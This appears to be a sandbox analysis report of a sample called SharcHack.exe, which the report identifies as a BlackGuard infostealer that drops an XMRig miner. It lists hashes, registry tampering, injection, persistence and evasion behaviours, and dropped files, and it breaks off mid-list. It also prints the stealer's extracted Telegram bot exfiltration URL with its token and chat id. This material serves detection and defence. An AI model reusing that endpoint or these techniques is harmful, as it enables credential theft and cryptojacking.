Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-12-2024 21:12
Static task
static1
Behavioral task
behavioral1
Sample
SharcHack.exe
Resource
win10v2004-20241007-en
General
-
Target
SharcHack.exe
-
Size
39.9MB
-
MD5
796310542e9fb2886de3f8cbdf88c9fa
-
SHA1
01dc8e64ff23db2f177e3d999c12329bfcd206d3
-
SHA256
9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193
-
SHA512
73295b9cfa07432b21d1f0d0bad360460f32d7e0170dc84406a35f4dfe2b1519fdc4028299f1075385ae4ab738be1e5bfffd7335c1038e2126669834e9a50966
-
SSDEEP
786432:Y31/CaCJz7+GWl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHng:URCR6GWl3LMEXFhV0KAcNjxAItjg
Malware Config
Extracted
blackguard
https://api.telegram.org/bot6540906397:AAG08fPgT-V7I17vtz49STaZEuwqXqKshuM/sendMessage?chat_id=5445185021
Signatures
-
BlackGuard
Infostealer first seen in Late 2021.
-
Blackguard family
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 2336 created 3416 2336 3.exe 56 PID 2336 created 3416 2336 3.exe 56 PID 2336 created 3416 2336 3.exe 56 PID 2336 created 3416 2336 3.exe 56 PID 2336 created 3416 2336 3.exe 56 PID 2232 created 3416 2232 updater.exe 56 PID 2232 created 3416 2232 updater.exe 56 PID 2232 created 3416 2232 updater.exe 56 PID 2232 created 3416 2232 updater.exe 56 PID 2232 created 3416 2232 updater.exe 56 PID 1992 created 3416 1992 conhost.exe 56 PID 2232 created 3416 2232 updater.exe 56 -
Xmrig family
-
XMRig Miner payload 3 IoCs
resource yara_rule behavioral1/memory/4900-469-0x00007FF7DD4C0000-0x00007FF7DDCB4000-memory.dmp xmrig behavioral1/memory/4900-477-0x00007FF7DD4C0000-0x00007FF7DDCB4000-memory.dmp xmrig behavioral1/memory/4900-1255-0x00007FF7DD4C0000-0x00007FF7DDCB4000-memory.dmp xmrig -
pid Process 400 powershell.exe 468 powershell.exe 852 powershell.exe 2640 powershell.exe -
Downloads MZ/PE file
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" MicrosoftEdgeUpdate.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation UIHost.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation RazerLightInstaller.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation RazerCentral_v7.16.0.695.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation Razer Axon_240662296.tmp Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation SharcHack.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation VegaStealer_v2.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation CheatEngine75.tmp -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 49 IoCs
pid Process 2336 3.exe 1764 VegaStealer_v2.exe 2208 CheatEngine75.exe 1512 v2.exe 4676 CheatEngine75.tmp 2232 updater.exe 3760 saBSI.exe 3612 OperaSetup.exe 4908 setup.exe 1852 RazerLightInstaller.exe 4904 setup.exe 3836 CheatEngine75.exe 2192 setup.exe 1864 setup.exe 4760 CheatEngine75.tmp 60 setup.exe 3704 _setup64.tmp 1452 installer.exe 4444 Kernelmoduleunloader.exe 4204 installer.exe 1420 windowsrepair.exe 5916 ServiceHost.exe 4564 UIHost.exe 6112 updater.exe 4328 Assistant_114.0.5282.21_Setup.exe_sfx.exe 5644 assistant_installer.exe 3512 assistant_installer.exe 3672 Razer Axon_240662296.exe 1416 Razer Axon_240662296.tmp 4628 RazerCentral_v7.16.0.695.exe 4976 irsetup.exe 6016 RazerCentralService.exe 5440 AxonManifestRepair.exe 3340 RazerComponentsController.exe 5500 RazerAxonISReporter.exe 2912 MicrosoftEdgeWebview2Setup.exe 5256 MicrosoftEdgeUpdate.exe 2188 MicrosoftEdgeUpdate.exe 264 MicrosoftEdgeUpdate.exe 5452 MicrosoftEdgeUpdateComRegisterShell64.exe 3056 MicrosoftEdgeUpdateComRegisterShell64.exe 2828 MicrosoftEdgeUpdateComRegisterShell64.exe 5172 MicrosoftEdgeUpdate.exe 2472 MicrosoftEdgeUpdate.exe 5176 MicrosoftEdgeUpdate.exe 1448 MicrosoftEdgeUpdate.exe 5888 MicrosoftEdge_X64_131.0.2903.112.exe 3580 setup.exe 976 setup.exe -
Loads dropped DLL 64 IoCs
pid Process 1512 v2.exe 1512 v2.exe 1512 v2.exe 1512 v2.exe 1512 v2.exe 4676 CheatEngine75.tmp 4908 setup.exe 4904 setup.exe 2192 setup.exe 1864 setup.exe 60 setup.exe 4204 installer.exe 5916 ServiceHost.exe 5916 ServiceHost.exe 5916 ServiceHost.exe 5916 ServiceHost.exe 4564 UIHost.exe 4564 UIHost.exe 5644 assistant_installer.exe 5644 assistant_installer.exe 3512 assistant_installer.exe 3512 assistant_installer.exe 1416 Razer Axon_240662296.tmp 4976 irsetup.exe 4976 irsetup.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 6016 RazerCentralService.exe 3340 RazerComponentsController.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 1308 icacls.exe 4404 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks for any installed AV software in registry 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir CheatEngine75.tmp Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\AVG\AV\Dir CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast CheatEngine75.tmp Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\AVAST Software\Avast CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir CheatEngine75.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 freegeoip.app 11 freegeoip.app 24 ip-api.com -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3196 cmd.exe 4444 powercfg.exe 4424 powercfg.exe 4832 powercfg.exe 5032 powercfg.exe 1624 powercfg.exe 3132 powercfg.exe 4648 cmd.exe 1864 powercfg.exe 1612 powercfg.exe -
Checks system information in the registry 2 TTPs 8 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe -
Drops file in System32 directory 13 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_992FA4D846EAEE42BB6F4D9934841082 RazerCentralService.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft RazerCentralService.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache RazerCentralService.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB RazerCentralService.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content RazerCentralService.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB RazerCentralService.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 RazerCentralService.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData RazerCentralService.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 RazerCentralService.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_992FA4D846EAEE42BB6F4D9934841082 RazerCentralService.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2232 set thread context of 1992 2232 updater.exe 142 PID 2232 set thread context of 4900 2232 updater.exe 148 -
resource yara_rule behavioral1/memory/4900-359-0x00007FF7DD4C0000-0x00007FF7DDCB4000-memory.dmp upx behavioral1/memory/4900-469-0x00007FF7DD4C0000-0x00007FF7DDCB4000-memory.dmp upx behavioral1/memory/4900-477-0x00007FF7DD4C0000-0x00007FF7DDCB4000-memory.dmp upx behavioral1/memory/4900-1255-0x00007FF7DD4C0000-0x00007FF7DDCB4000-memory.dmp upx behavioral1/files/0x0007000000024540-4368.dat upx behavioral1/memory/4976-4373-0x0000000000630000-0x0000000000A18000-memory.dmp upx behavioral1/memory/4976-5748-0x0000000000630000-0x0000000000A18000-memory.dmp upx behavioral1/memory/4976-7470-0x0000000000630000-0x0000000000A18000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-dialog-balloon-es-ES.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-adblock-nl-NL.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\uimanager.dll installer.exe File created C:\Program Files\McAfee\Temp1332852585\jslang\eula-es-ES.txt installer.exe File created C:\Program Files\McAfee\Webadvisor\Analytics\Scripts\wa_settingsdb.js ServiceHost.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-bing-sr-Latn-CS.js installer.exe File created C:\Program Files\McAfee\Temp1332852585\main_close_large.png installer.exe File created C:\Program Files\Cheat Engine 7.5\autorun\is-A2MOA.tmp CheatEngine75.tmp File created C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-sstoast-toggle.html installer.exe File created C:\Program Files (x86)\Razer\Razer Axon\is-AJQKM.tmp Razer Axon_240662296.tmp File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-checklist-nb-NO.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-ss-toast-variants-cs-CZ.js installer.exe File created C:\Program Files\McAfee\Webadvisor\Analytics\Scripts\mcutil.js ServiceHost.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-oem-ss-toast-variants-el-GR.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-adblock-de-DE.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-bing-fi-FI.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-uninstall-pt-BR.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-webboost-fi-FI.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\new-tab-res-toast-sk-SK.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-dialog-balloon-fr-FR.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\wa-ss-toast-rebranding-bing.css installer.exe File created C:\Program Files (x86)\Razer\Razer Axon\cs\is-298OF.tmp Razer Axon_240662296.tmp File created C:\Program Files\McAfee\WebAdvisor\analyticstelemetry\context\msspstatus.luc installer.exe File created C:\Program Files (x86)\Razer\Razer Axon\is-89L4I.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Axon\is-GOMII.tmp Razer Axon_240662296.tmp File created C:\Program Files\McAfee\WebAdvisor\MFW\packages\builtin\wa_score_logo.png installer.exe File created C:\Program Files (x86)\Razer\Razer Axon\is-SJL4D.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Services\Razer Central\CefSharp.dll irsetup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU4210.tmp\msedgeupdateres_nn.dll MicrosoftEdgeWebview2Setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU4210.tmp\msedgeupdateres_is.dll MicrosoftEdgeWebview2Setup.exe File created C:\Program Files\Cheat Engine 7.5\include\is-5QN5H.tmp CheatEngine75.tmp File created C:\Program Files (x86)\Razer\Razer Axon\ru\is-SFKHM.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Services\Razer Central\en-US\Razer Updater.resources.dll irsetup.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-overlay-es-MX.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-score-toast-fr-FR.js installer.exe File created C:\Program Files (x86)\Razer\Razer Axon\is-G7BNK.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Axon\is-CNRKB.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Axon\de\is-7EU0O.tmp Razer Axon_240662296.tmp File created C:\Program Files\Cheat Engine 7.5\include\winapi\is-LU29O.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-91OT3.tmp CheatEngine75.tmp File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-checklist-sv-SE.js installer.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.112\concrt140.dll setup.exe File opened for modification C:\Program Files (x86)\Razer\Razer Services\Razer Central\zh-CN\Razer Updater.resources.dll irsetup.exe File created C:\Program Files (x86)\Razer\Razer Services\Razer Central\Microsoft.Extensions.Logging.Abstractions.dll irsetup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU4210.tmp\msedgeupdateres_hi.dll MicrosoftEdgeWebview2Setup.exe File created C:\Program Files (x86)\Razer\Razer Axon\zh-Hant\is-83V91.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Services\Razer Central\OSExtensions.dll irsetup.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-shared-zh-CN.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\analyticstelemetry\context\externalutilityfunction.luc installer.exe File created C:\Program Files (x86)\Razer\Razer Axon\is-6EKHI.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Axon\is-QDTC5.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Axon\is-HCGFR.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Axon\es\is-N19I4.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Services\Razer Central\concrt140.dll irsetup.exe File created C:\Program Files\Cheat Engine 7.5\include\winapi\is-AIBQO.tmp CheatEngine75.tmp File created C:\Program Files\McAfee\WebAdvisor\jslang\new-tab-res-toast-es-MX.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-options-zh-TW.js installer.exe File opened for modification C:\Program Files (x86)\Razer\Razer Services\Razer Central\Hardcodet.Wpf.TaskbarNotification.dll irsetup.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-options.css installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-uninstall-da-DK.js installer.exe File created C:\Program Files (x86)\Razer\Razer Axon\is-2OB3I.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Axon\is-0SVT4.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Axon\is-ALI15.tmp Razer Axon_240662296.tmp File created C:\Program Files (x86)\Razer\Razer Axon\is-QMTG3.tmp Razer Axon_240662296.tmp -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-locale-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-utility-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\Newtonsoft.Json.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-profile-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-util-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\rzS3detgmr_CWrapper.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\vccorlib140.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-processthreads-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-multibyte-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer Central\RCUninstall\uninstall.dat irsetup.exe File created C:\Windows\Installer\Razer\Installer\App\ja-JP\Razer.RazerInstallerCommon.resources.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\zh-CHS\Razer.RazerInstallerCommon.resources.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-file-l1-2-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-environment-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\InstallationFolder.xml AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\Razer.RazerInstallerCommon.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\pt-BR\Razer.RazerInstallerCommon.resources.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-console-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-conio-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\InstalledSoftwareModules.xml AxonManifestRepair.exe File created C:\Windows\Installer\Razer Central\lua5.1.dll irsetup.exe File created C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-handle-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-processenvironment-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-synch-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\System.Net.Http.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\BLEConnect.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-file-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-stdio-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\{0CD55593-F275-4aea-92B2-9170B5A14644}\RC\RzRC_install.log irsetup.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-localization-l1-2-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-process-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-interlocked-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-libraryloader-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-memory-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-string-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer Central\RCUninstall\IRZip.lmd irsetup.exe File created C:\Windows\Installer\Razer\Installer\App\cpprest140_2_10.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-file-l2-1-0.dll AxonManifestRepair.exe File created C:\Windows\Fonts\is-HQA9B.tmp Razer Axon_240662296.tmp File opened for modification C:\Windows\Installer\Razer Central\RCUninstall\uni352.tmp irsetup.exe File created C:\Windows\Installer\Razer\Installer\App\vcruntime140.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-datetime-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-synch-l1-2-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-timezone-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer Central\RCUninstall\uni352.tmp irsetup.exe File created C:\Windows\Installer\Razer Central\RCUninstall.exe irsetup.exe File created C:\Windows\Installer\Razer\Installer\App\BLEConnectWrapper.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-rtlsupport-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-string-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-filesystem-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-runtime-l1-1-0.dll AxonManifestRepair.exe File opened for modification C:\Windows\Installer\Razer Central\RCUninstall\uninstall.dat irsetup.exe File created C:\Windows\Installer\Razer Central\RCUninstall\IRIMG2.JPG irsetup.exe File created C:\Windows\Installer\Razer\Installer\App\de-DE\Razer.RazerInstallerCommon.resources.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-private-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-debug-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-heap-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-sysinfo-l1-1-0.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\concrt140.dll AxonManifestRepair.exe File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-math-l1-1-0.dll AxonManifestRepair.exe File opened for modification C:\Windows\Installer\{0CD55593-F275-4aea-92B2-9170B5A14644}\RC\RzRC_install.log irsetup.exe File opened for modification C:\Windows\Installer\Razer Central\RCUninstall\IRIMG1.JPG irsetup.exe File created C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe.config AxonManifestRepair.exe -
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2300 sc.exe 2676 sc.exe 3876 sc.exe 2272 sc.exe 4932 sc.exe 4484 sc.exe 1840 sc.exe 3816 sc.exe 4352 sc.exe 3164 sc.exe 2120 sc.exe 4628 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 35 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CheatEngine75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language irsetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RazerCentralService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language saBSI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kernelmoduleunloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language assistant_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RazerLightInstaller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RazerCentral_v7.16.0.695.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RazerAxonISReporter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SharcHack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened 